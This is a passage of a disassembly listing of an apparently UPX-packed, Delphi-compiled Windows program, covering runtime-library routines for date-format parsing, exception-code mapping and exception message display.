xor eax, eax
jmp short loc_40754E
; ---------------------------------------------------------------------------
loc_40754C: ; CODE XREF: sub_4074D8+65�j
; sub_4074D8+6E�j
mov al, 1
loc_40754E: ; CODE XREF: sub_4074D8+72�j
test al, al
jz short loc_407587
jmp short loc_407577
; ---------------------------------------------------------------------------
loc_407554: ; CODE XREF: sub_4074D8+A8�j
mov al, [esi+ebx-1]
sub al, 47h
jz short loc_407576
sub al, 20h
jz short loc_407576
lea eax, [ebp+var_8]
mov dl, [esi+ebx-1]
call sub_403370
mov edx, [ebp+var_8]
mov eax, edi
call sub_40342C
loc_407576: ; CODE XREF: sub_4074D8+82�j
; sub_4074D8+86�j
inc ebx
loc_407577: ; CODE XREF: sub_4074D8+7A�j
mov eax, esi
call sub_403424
cmp ebx, eax
jle short loc_407554
jmp loc_40767F
; ---------------------------------------------------------------------------
loc_407587: ; CODE XREF: sub_4074D8+78�j
mov eax, edi
mov edx, esi
call sub_40321C
jmp loc_40767F
; ---------------------------------------------------------------------------
loc_407595: ; CODE XREF: sub_4074D8+1A1�j
mov al, [esi+ebx-1]
and eax, 0FFh
bt dword_40B108, eax
jnb short loc_4075CB
lea eax, [ebp+var_C]
push eax
mov ecx, 2
mov edx, ebx
mov eax, esi
call sub_403540
mov edx, [ebp+var_C]
mov eax, edi
call sub_40342C
add ebx, 2
jmp loc_407670
; ---------------------------------------------------------------------------
loc_4075CB: ; CODE XREF: sub_4074D8+CD�j
mov edx, offset dword_4076B4
lea eax, [esi+ebx-1]
mov ecx, 2
call sub_4068BC
test eax, eax
jnz short loc_4075F1
mov eax, edi
mov edx, offset dword_4076C0
call sub_40342C
inc ebx
jmp short loc_40766F
; ---------------------------------------------------------------------------
loc_4075F1: ; CODE XREF: sub_4074D8+108�j
mov edx, offset aYyyy ; "yyyy"
lea eax, [esi+ebx-1]
mov ecx, 4
call sub_4068BC
test eax, eax
jnz short loc_407619
mov eax, edi
mov edx, offset aEeee ; "eeee"
call sub_40342C
add ebx, 3
jmp short loc_40766F
; ---------------------------------------------------------------------------
loc_407619: ; CODE XREF: sub_4074D8+12E�j
mov edx, offset aYy ; "yy"
lea eax, [esi+ebx-1]
mov ecx, 2
call sub_4068BC
test eax, eax
jnz short loc_40763F
mov eax, edi
mov edx, offset dword_4076E8
call sub_40342C
inc ebx
jmp short loc_40766F
; ---------------------------------------------------------------------------
loc_40763F: ; CODE XREF: sub_4074D8+156�j
mov al, [esi+ebx-1]
sub al, 59h
jz short loc_40764B
sub al, 20h
jnz short loc_407659
loc_40764B: ; CODE XREF: sub_4074D8+16D�j
mov eax, edi
mov edx, offset dword_4076F4
call sub_40342C
jmp short loc_40766F
; ---------------------------------------------------------------------------
loc_407659: ; CODE XREF: sub_4074D8+171�j
lea eax, [ebp+var_10]
mov dl, [esi+ebx-1]
call sub_403370
mov edx, [ebp+var_10]
mov eax, edi
call sub_40342C
loc_40766F: ; CODE XREF: sub_4074D8+117�j
; sub_4074D8+13F�j ...
inc ebx
loc_407670: ; CODE XREF: sub_4074D8+55�j
; sub_4074D8+EE�j
mov eax, esi
call sub_403424
cmp ebx, eax
jle loc_407595
loc_40767F: ; CODE XREF: sub_4074D8+AA�j
; sub_4074D8+B8�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4076A1
loc_40768C: ; CODE XREF: sub_4074D8+1C7�j
lea eax, [ebp+var_10]
mov edx, 4
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_40769A: ; DATA XREF: sub_4074D8+13�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_40768C
; ---------------------------------------------------------------------------
loc_4076A1: ; CODE XREF: sub_4074D8+1C1�j
; DATA XREF: sub_4074D8+1AF�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4074D8 endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 1
dword_4076B0 dd 31h dword_4076B4 dd 6767h, 0FFFFFFFFh, 3dword_4076C0 dd 676767h aYyyy db 'yyyy',0 ; DATA XREF: sub_4074D8:loc_4075F1�o
align 4
dd 0FFFFFFFFh, 4
aEeee db 'eeee',0 ; DATA XREF: sub_4074D8+132�o
align 4
aYy db 'yy',0 ; DATA XREF: sub_4074D8:loc_407619�o
align 10h
dd 0FFFFFFFFh, 2
dword_4076E8 dd 6565h, 0FFFFFFFFh, 1dword_4076F4 dd 65h
; =============== S U B R O U T I N E =======================================
sub_4076F8 proc near ; CODE XREF: sub_407704+63�p
test eax, eax
jz short locret_407701
sub eax, 1000h
locret_407701: ; CODE XREF: sub_4076F8+2�j
retn
sub_4076F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407704 proc near ; CODE XREF: sub_40788C+F�p
var_458 = byte ptr -458h
var_358 = dword ptr -358h
var_354 = byte ptr -354h
var_350 = dword ptr -350h
var_34C = byte ptr -34Ch
var_348 = dword ptr -348h
var_344 = byte ptr -344h
var_340 = dword ptr -340h
var_33C = byte ptr -33Ch
var_338 = dword ptr -338h
var_334 = byte ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_320 = dword ptr -320h
var_312 = byte ptr -312h
var_212 = byte ptr -212h
var_10D = byte ptr -10Dh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFBA8h
push ebx
push esi
push edi
mov [ebp+var_4], ecx
mov ebx, edx
mov esi, eax
push 1Ch
lea eax, [ebp+var_330]
push eax
push ebx
call sub_405748 ; VirtualQuery
cmp [ebp+var_320], 1000h
jnz short loc_40774E
push 105h
lea eax, [ebp+var_212]
push eax
mov eax, [ebp+var_32C]
push eax
call sub_405700 ; GetModuleFileNameA
test eax, eax
jnz short loc_407771
loc_40774E: ; CODE XREF: sub_407704+2C�j
push 105h
lea eax, [ebp+var_212]
push eax
mov eax, dword_40C4DC
push eax
call sub_405700 ; GetModuleFileNameA
mov eax, ebx
call sub_4076F8
mov [ebp+var_8], eax
jmp short loc_40777A
; ---------------------------------------------------------------------------
loc_407771: ; CODE XREF: sub_407704+48�j
sub ebx, [ebp+var_32C]
mov [ebp+var_8], ebx
loc_40777A: ; CODE XREF: sub_407704+6B�j
lea eax, [ebp+var_212]
mov dl, 5Ch
call sub_4082C0
mov edx, eax
inc edx
lea eax, [ebp+var_10D]
mov ecx, 104h
call sub_406888
mov ebx, offset dword_407884
mov edi, offset dword_407884
mov eax, esi
mov edx, off_405AA8
call sub_402958
test al, al
jz short loc_4077D6
mov eax, [esi+4]
call sub_403534
mov ebx, eax
mov eax, ebx
call sub_406834
test eax, eax
jz short loc_4077D6
cmp byte ptr [ebx+eax-1], 2Eh
jz short loc_4077D6
mov edi, offset dword_407888
loc_4077D6: ; CODE XREF: sub_407704+AF�j
; sub_407704+C4�j ...
push 100h
lea eax, [ebp+var_312]
push eax
mov eax, off_40B478
mov eax, [eax+4]
push eax
mov eax, dword_40C4DC
call sub_4042D4
push eax
call sub_405770 ; LoadStringA
lea edx, [ebp+var_458]
mov eax, [esi]
call sub_402894
lea eax, [ebp+var_458]
mov [ebp+var_358], eax
mov [ebp+var_354], 4
lea eax, [ebp+var_10D]
mov [ebp+var_350], eax
mov [ebp+var_34C], 6
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov [ebp+var_344], 5
mov [ebp+var_340], ebx
mov [ebp+var_33C], 6
mov [ebp+var_338], edi
mov [ebp+var_334], 6
lea eax, [ebp+var_358]
push eax
push 4
lea ecx, [ebp+var_312]
mov edx, [ebp+arg_0]
mov eax, [ebp+var_4]
call sub_406D94
mov eax, [ebp+var_4]
call sub_406834
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_407704 endp
; ---------------------------------------------------------------------------
align 4
dword_407884 dd 0 ; sub_407704+9B�o
dword_407888 dd 2Eh
; =============== S U B R O U T I N E =======================================
sub_40788C proc near ; CODE XREF: sub_407FF8�p
var_440 = byte ptr -440h
var_400 = byte ptr -400h
add esp, 0FFFFFBC0h
push 400h
lea ecx, [esp+444h+var_400]
call sub_407704
mov eax, off_40B428
cmp byte ptr [eax], 0
jz short loc_4078C4
lea edx, [esp+440h+var_400]
mov eax, off_40B374
call sub_404E00
call sub_404D83
call sub_402618
jmp short loc_4078FA
; ---------------------------------------------------------------------------
loc_4078C4: ; CODE XREF: sub_40788C+1C�j
push 40h
lea eax, [esp+444h+var_440]
push eax
mov eax, off_40B358
mov eax, [eax+4]
push eax
mov eax, dword_40C4DC
call sub_4042D4
push eax
call sub_405770 ; LoadStringA
push 2010h
lea eax, [esp+444h+var_440]
push eax
lea eax, [esp+448h+var_400]
push eax
push 0
call sub_405778 ; MessageBoxA
loc_4078FA: ; CODE XREF: sub_40788C+36�j
add esp, 440h
retn
sub_40788C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_407904 proc near ; CODE XREF: sub_406454+C�p
; sub_407B04+32�p ...
push ebx
push esi
push edi
test dl, dl
jz short loc_407913
add esp, 0FFFFFFF0h
call sub_4029DC
loc_407913: ; CODE XREF: sub_407904+5�j
mov esi, ecx
mov ebx, edx
mov edi, eax
lea eax, [edi+4]
mov edx, esi
call sub_40321C
mov eax, edi
test bl, bl
jz short loc_407938
call sub_402A34
pop large dword ptr fs:0
add esp, 0Ch
loc_407938: ; CODE XREF: sub_407904+23�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_407904 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407940 proc near ; CODE XREF: sub_40646C+32�p
; sub_407BC8+77�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push ebx
push esi
push edi
test dl, dl
jz short loc_407954
add esp, 0FFFFFFF0h
call sub_4029DC
loc_407954: ; CODE XREF: sub_407940+A�j
mov esi, ecx
mov ebx, edx
mov edi, eax
xor eax, eax
push ebp
push offset loc_40799A
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
push eax
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
mov eax, esi
call sub_406DC8
mov edx, [ebp+var_4]
lea eax, [edi+4]
call sub_40321C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4079A1
loc_407991: ; CODE XREF: sub_407940+5F�j
lea eax, [ebp+var_4]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_40799A: ; DATA XREF: sub_407940+1D�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_407991
; ---------------------------------------------------------------------------
loc_4079A1: ; CODE XREF: sub_407940+59�j
; DATA XREF: sub_407940+4C�o
mov eax, edi
test bl, bl
jz short loc_4079B6
call sub_402A34
pop large dword ptr fs:0
add esp, 0Ch
loc_4079B6: ; CODE XREF: sub_407940+65�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 8
sub_407940 endp
; =============== S U B R O U T I N E =======================================
sub_4079C0 proc near ; CODE XREF: sub_409FB8+D�p
push ebx
push esi
push edi
test dl, dl
jz short loc_4079CF
add esp, 0FFFFFFF0h
call sub_4029DC
loc_4079CF: ; CODE XREF: sub_4079C0+5�j
mov esi, ecx
mov ebx, edx
mov edi, eax
lea edx, [edi+4]
mov eax, esi
call sub_40478C
mov eax, edi
test bl, bl
jz short loc_4079F4
call sub_402A34
pop large dword ptr fs:0
add esp, 0Ch
loc_4079F4: ; CODE XREF: sub_4079C0+23�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_4079C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079FC proc near ; CODE XREF: sub_407B04+51�p
; sub_407CA0+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
push 0
push ebx
push esi
push edi
test dl, dl
jz short loc_407A12
add esp, 0FFFFFFF0h
call sub_4029DC
loc_407A12: ; CODE XREF: sub_4079FC+C�j
mov esi, ecx
mov ebx, edx
mov edi, eax
xor eax, eax
push ebp
push offset loc_407A68
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
push eax
lea edx, [ebp+var_8]
mov eax, esi
call sub_40478C
mov eax, [ebp+var_8]
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
call sub_406DC8
mov edx, [ebp+var_4]
lea eax, [edi+4]
call sub_40321C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_407A6F
loc_407A5A: ; CODE XREF: sub_4079FC+71�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_4031EC
retn
; ---------------------------------------------------------------------------
loc_407A68: ; DATA XREF: sub_4079FC+1F�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_407A5A
; ---------------------------------------------------------------------------
loc_407A6F: ; CODE XREF: sub_4079FC+6B�j
; DATA XREF: sub_4079FC+59�o
mov eax, edi
test bl, bl
jz short loc_407A84
call sub_402A34
pop large dword ptr fs:0
add esp, 0Ch
loc_407A84: ; CODE XREF: sub_4079FC+77�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 8
sub_4079FC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A90 proc near ; CODE XREF: sub_409808+84�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
test dl, dl
jz short loc_407AA2
add esp, 0FFFFFFF0h
call sub_4029DC
loc_407AA2: ; CODE XREF: sub_407A90+8�j
mov esi, ecx
mov ebx, edx
mov edi, eax
lea eax, [edi+4]
mov edx, esi
call sub_40321C
mov eax, [ebp+arg_0]
mov [edi+8], eax
mov eax, edi
test bl, bl
jz short loc_407ACD
call sub_402A34
pop large dword ptr fs:0
add esp, 0Ch
loc_407ACD: ; CODE XREF: sub_407A90+2C�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn 4
sub_407A90 endp
; ---------------------------------------------------------------------------
align 4
cmp byte ptr [eax+0Ch], 0
jz short locret_407AE3
call sub_4028BC
locret_407AE3: ; CODE XREF: UPX0:00407ADC�j
retn
; ---------------------------------------------------------------------------
off_407AE4 dd offset dword_407AE8 ; DATA XREF: UPX0:004093CC�r
dword_407AE8 dd 4554090Eh, 726F7272h, 8636552h, 1000000h, 0 dd 4004010h, 90000000h
; =============== S U B R O U T I N E =======================================
sub_407B04 proc near ; CODE XREF: sub_407B84:loc_407BBA�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
xor ebx, ebx
call sub_402648
mov esi, eax
jmp short loc_407B15
; ---------------------------------------------------------------------------
loc_407B14: ; CODE XREF: sub_407B04+1D�j
inc ebx
loc_407B15: ; CODE XREF: sub_407B04+E�j
cmp ebx, 6
jg short loc_407B23
cmp esi, dword_40B1D0[ebx*8]
jnz short loc_407B14
loc_407B23: ; CODE XREF: sub_407B04+14�j
cmp ebx, 6
jg short loc_407B3D
mov ecx, dword_40B1D4[ebx*8]
mov dl, 1
mov eax, off_405BC8
call sub_407904
jmp short loc_407B5A
; ---------------------------------------------------------------------------
loc_407B3D: ; CODE XREF: sub_407B04+22�j
mov [esp+10h+var_10], esi
mov [esp+10h+var_C], 0
push esp
push 0
mov ecx, off_40B354
mov dl, 1
mov eax, off_405BC8
call sub_4079FC
loc_407B5A: ; CODE XREF: sub_407B04+37�j
mov [eax+0Ch], esi
pop ecx
pop edx
pop esi
pop ebx
retn
sub_407B04 endp
; ---------------------------------------------------------------------------
align 4
off_407B64 dd offset dword_407B68 ; DATA XREF: UPX0:004093B7�r
dword_407B68 dd 45540A0Eh, 70656378h, 63655274h, 8, 1, 401000h, 4
; DATA XREF: UPX0:off_407B64�o
; =============== S U B R O U T I N E =======================================
sub_407B84 proc near ; CODE XREF: sub_4025D4+E�p
; DATA XREF: sub_408008+5C�o ...
push ebx
mov ebx, edx
mov edx, eax
dec edx
jz short loc_407B97
dec edx
jz short loc_407B9E
dec edx
sub edx, 16h
jb short loc_407BA5
jmp short loc_407BBA
; ---------------------------------------------------------------------------
loc_407B97: ; CODE XREF: sub_407B84+6�j
mov eax, dword_40C5FC
jmp short loc_407BBF
; ---------------------------------------------------------------------------
loc_407B9E: ; CODE XREF: sub_407B84+9�j
mov eax, dword_40C600
jmp short loc_407BBF
; ---------------------------------------------------------------------------
loc_407BA5: ; CODE XREF: sub_407B84+F�j
lea eax, ds:40B1F0h[eax*8]
mov ecx, [eax+4]
mov eax, [eax]
mov dl, 1
call sub_407904
jmp short loc_407BBF
; ---------------------------------------------------------------------------
loc_407BBA: ; CODE XREF: sub_407B84+11�j
call sub_407B04
loc_407BBF: ; CODE XREF: sub_407B84+18�j
; sub_407B84+1F�j ...
push ebx
jmp sub_402C98
sub_407B84 endp
; ---------------------------------------------------------------------------
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BC8 proc near ; CODE XREF: sub_407C84+3�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+var_4], ebx
mov edi, ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_407C64
push dword ptr fs:[eax]
mov fs:[eax], esp
test ebx, ebx
jz short loc_407BFD
lea eax, [ebp+var_4]
mov edx, ebx
call sub_403260
jmp short loc_407C0A
; ---------------------------------------------------------------------------
loc_407BFD: ; CODE XREF: sub_407BC8+27�j
lea edx, [ebp+var_4]
mov eax, off_40B418
call sub_40478C
loc_407C0A: ; CODE XREF: sub_407BC8+33�j
mov eax, [ebp+var_4]
mov [ebp+var_1C], eax
mov [ebp+var_18], 0Bh
mov [ebp+var_14], esi
mov [ebp+var_10], 0Bh
mov [ebp+var_C], edi
mov [ebp+var_8], 0
lea eax, [ebp+var_1C]
push eax
push 2
lea edx, [ebp+var_20]
mov eax, off_40B444
call sub_40478C
mov ecx, [ebp+var_20]
mov dl, 1
mov eax, off_4062D0
call sub_407940
mov ebx, eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_407C6B
loc_407C53: ; CODE XREF: sub_407BC8+A1�j
lea eax, [ebp+var_20]
call sub_4031C8
lea eax, [ebp+var_4]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_407C64: ; DATA XREF: sub_407BC8+1A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_407C53
; ---------------------------------------------------------------------------
loc_407C6B: ; CODE XREF: sub_407BC8+9B�j
; DATA XREF: sub_407BC8+86�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_407BC8 endp
; =============== S U B R O U T I N E =======================================
sub_407C74 proc near ; CODE XREF: sub_407C84+11�p
mov esp, ecx
mov [esp+0], edx
mov ebp, [ebp+0]
jmp sub_402C98
sub_407C74 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C84 proc near ; DATA XREF: sub_408008+95�o
; UPX0:off_40C018�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
call sub_407BC8
lea ecx, [ebp+arg_0]
add ecx, 4
mov edx, [ebp+arg_0]
call sub_407C74
pop ebp
retn 4
sub_407C84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407CA0 proc near ; DATA XREF: sub_408008+A0�o
; UPX0:off_40C01C�o
var_8 = dword ptr -8
var_4 = byte ptr -4
add esp, 0FFFFFFF8h
xor eax, eax
mov [esp+8+var_8], eax
mov [esp+8+var_4], 0Bh
push esp
push 0
mov ecx, off_40B36C
mov dl, 1
mov eax, off_406330
call sub_4079FC
call sub_402C98
pop ecx
pop edx
retn
sub_407CA0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_407CCC proc near ; CODE XREF: UPX0:loc_407D4C�p
; sub_407F2C+20�p
mov eax, [eax]
cmp eax, 0C0000092h
jg short loc_407D01
jz short loc_407D30
cmp eax, 0C000008Eh
jg short loc_407CF3
jz short loc_407D33
sub eax, 0C0000005h
jz short loc_407D3C
sub eax, 87h
jz short loc_407D2A
dec eax
jz short loc_407D39
jmp short loc_407D48
; ---------------------------------------------------------------------------
loc_407CF3: ; CODE XREF: sub_407CCC+10�j
add eax, 3FFFFF71h
sub eax, 2
jb short loc_407D30
jz short loc_407D36
jmp short loc_407D48
; ---------------------------------------------------------------------------
loc_407D01: ; CODE XREF: sub_407CCC+7�j
cmp eax, 0C0000096h
jg short loc_407D19
jz short loc_407D3F
sub eax, 0C0000093h
jz short loc_407D39
dec eax
jz short loc_407D27
dec eax
jz short loc_407D2D
jmp short loc_407D48
; ---------------------------------------------------------------------------
loc_407D19: ; CODE XREF: sub_407CCC+3A�j
sub eax, 0C00000FDh
jz short loc_407D45
sub eax, 3Dh
jz short loc_407D42
jmp short loc_407D48
; ---------------------------------------------------------------------------
loc_407D27: ; CODE XREF: sub_407CCC+46�j
mov al, 3
retn
; ---------------------------------------------------------------------------
loc_407D2A: ; CODE XREF: sub_407CCC+20�j
mov al, 4
retn
; ---------------------------------------------------------------------------
loc_407D2D: ; CODE XREF: sub_407CCC+49�j
mov al, 5
retn
; ---------------------------------------------------------------------------
loc_407D30: ; CODE XREF: sub_407CCC+9�j
; sub_407CCC+2F�j
mov al, 6
retn
; ---------------------------------------------------------------------------
loc_407D33: ; CODE XREF: sub_407CCC+12�j
mov al, 7
retn
; ---------------------------------------------------------------------------
loc_407D36: ; CODE XREF: sub_407CCC+31�j
mov al, 8
retn
; ---------------------------------------------------------------------------
loc_407D39: ; CODE XREF: sub_407CCC+23�j
; sub_407CCC+43�j
mov al, 9
retn
; ---------------------------------------------------------------------------
loc_407D3C: ; CODE XREF: sub_407CCC+19�j
mov al, 0Bh
retn
; ---------------------------------------------------------------------------
loc_407D3F: ; CODE XREF: sub_407CCC+3C�j
mov al, 0Ch
retn
; ---------------------------------------------------------------------------
loc_407D42: ; CODE XREF: sub_407CCC+57�j
mov al, 0Dh
retn
; ---------------------------------------------------------------------------
loc_407D45: ; CODE XREF: sub_407CCC+52�j
mov al, 0Eh
retn
; ---------------------------------------------------------------------------
loc_407D48: ; CODE XREF: sub_407CCC+25�j
; sub_407CCC+33�j ...
mov al, 16h
retn
sub_407CCC endp
; ---------------------------------------------------------------------------
align 4
loc_407D4C: ; DATA XREF: sub_408008+7F�o
; UPX0:off_40C008�o
call sub_407CCC
and eax, 0FFh
mov eax, dword_40B1F0[eax*8]
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D60 proc near ; CODE XREF: sub_407F2C+54�p
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_15C = dword ptr -15Ch
var_158 = byte ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_125 = byte ptr -125h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFE90h
push ebx
push esi
xor eax, eax
mov [ebp+var_170], eax
mov [ebp+var_14C], eax
mov [ebp+var_154], eax
mov [ebp+var_150], eax
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_407F1B
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_0]
mov ebx, [eax-4]
cmp dword ptr [ebx+14h], 0
jnz short loc_407DB1
lea edx, [ebp+var_4]
mov eax, off_40B484
call sub_40478C
jmp short loc_407DBE
; ---------------------------------------------------------------------------
loc_407DB1: ; CODE XREF: sub_407D60+40�j
lea edx, [ebp+var_4]
mov eax, off_40B404
call sub_40478C
loc_407DBE: ; CODE XREF: sub_407D60+4F�j
mov esi, [ebx+18h]
push 1Ch
lea eax, [ebp+var_20]
push eax
mov eax, [ebx+0Ch]
push eax
call sub_405748 ; VirtualQuery
cmp [ebp+var_10], 1000h
jnz loc_407E90
push 105h
lea eax, [ebp+var_125]
push eax
mov eax, [ebp+var_1C]
push eax
call sub_405700 ; GetModuleFileNameA
test eax, eax
jz loc_407E90
mov eax, [ebx+0Ch]
mov [ebp+var_148], eax
mov [ebp+var_144], 5
lea eax, [ebp+var_150]
lea edx, [ebp+var_125]
mov ecx, 105h
call sub_4033F8
mov eax, [ebp+var_150]
lea edx, [ebp+var_14C]
call sub_4066D4
mov eax, [ebp+var_14C]
mov [ebp+var_140], eax
mov [ebp+var_13C], 0Bh
mov eax, [ebp+var_4]
mov [ebp+var_138], eax
mov [ebp+var_134], 0Bh
mov [ebp+var_130], esi
mov [ebp+var_12C], 5
lea eax, [ebp+var_148]
push eax
push 3
lea edx, [ebp+var_154]
mov eax, off_40B438
call sub_40478C
mov ecx, [ebp+var_154]
mov dl, 1
mov eax, off_406108
call sub_407940
mov ebx, eax
jmp short loc_407EEA
; ---------------------------------------------------------------------------
loc_407E90: ; CODE XREF: sub_407D60+77�j
; sub_407D60+94�j
mov eax, [ebx+0Ch]
mov [ebp+var_16C], eax
mov [ebp+var_168], 5
mov eax, [ebp+var_4]
mov [ebp+var_164], eax
mov [ebp+var_160], 0Bh
mov [ebp+var_15C], esi
mov [ebp+var_158], 5
lea eax, [ebp+var_16C]
push eax
push 2
lea edx, [ebp+var_170]
mov eax, off_40B458
call sub_40478C
mov ecx, [ebp+var_170]
mov dl, 1
mov eax, off_406108
call sub_407940
mov ebx, eax
loc_407EEA: ; CODE XREF: sub_407D60+12E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_407F22
loc_407EF7: ; CODE XREF: sub_407D60+1C0�j
lea eax, [ebp+var_170]
call sub_4031C8
lea eax, [ebp+var_154]
mov edx, 3
call sub_4031EC
lea eax, [ebp+var_4]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_407F1B: ; DATA XREF: sub_407D60+2B�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_407EF7
; ---------------------------------------------------------------------------
loc_407F22: ; CODE XREF: sub_407D60+1BA�j
; DATA XREF: sub_407D60+192�o
mov eax, ebx
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_407D60 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F2C proc near ; CODE XREF: sub_402B34+33�p
; UPX0:00402E63�p
; DATA XREF: ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
xor edx, edx
mov [ebp+var_10], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_407FE7
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_407CCC
and eax, 0FFh
mov edx, eax
add edx, 0FFFFFFFDh
sub edx, 8
jb short loc_407F68
jz short loc_407F7F
dec edx
sub edx, 0Ah
jnb short loc_407F8A
loc_407F68: ; CODE XREF: sub_407F2C+32�j
lea eax, ds:40B1F0h[eax*8]
mov ecx, [eax+4]
mov eax, [eax]
mov dl, 1
call sub_407904
mov ebx, eax
jmp short loc_407FBA
; ---------------------------------------------------------------------------
loc_407F7F: ; CODE XREF: sub_407F2C+34�j
push ebp
call sub_407D60
pop ecx
mov ebx, eax
jmp short loc_407FBA
; ---------------------------------------------------------------------------
loc_407F8A: ; CODE XREF: sub_407F2C+3A�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_C], eax
mov [ebp+var_8], 0
lea eax, [ebp+var_C]
push eax
push 0
lea edx, [ebp+var_10]
mov eax, off_40B31C
call sub_40478C
mov ecx, [ebp+var_10]
mov dl, 1
mov eax, off_405C78
call sub_407940
mov ebx, eax
loc_407FBA: ; CODE XREF: sub_407F2C+51�j
; sub_407F2C+5C�j
mov eax, ebx
mov edx, off_405C20
call sub_402958
test al, al
jz short loc_407FD1
mov eax, [ebp+var_4]
mov [ebx+0Ch], eax
loc_407FD1: ; CODE XREF: sub_407F2C+9D�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_407FEE
loc_407FDE: ; CODE XREF: sub_407F2C+C0�j
lea eax, [ebp+var_10]
call sub_4031C8
retn
; ---------------------------------------------------------------------------
loc_407FE7: ; DATA XREF: sub_407F2C+12�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_407FDE
; ---------------------------------------------------------------------------
loc_407FEE: ; CODE XREF: sub_407F2C+BA�j
; DATA XREF: sub_407F2C+AD�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_407F2C endp
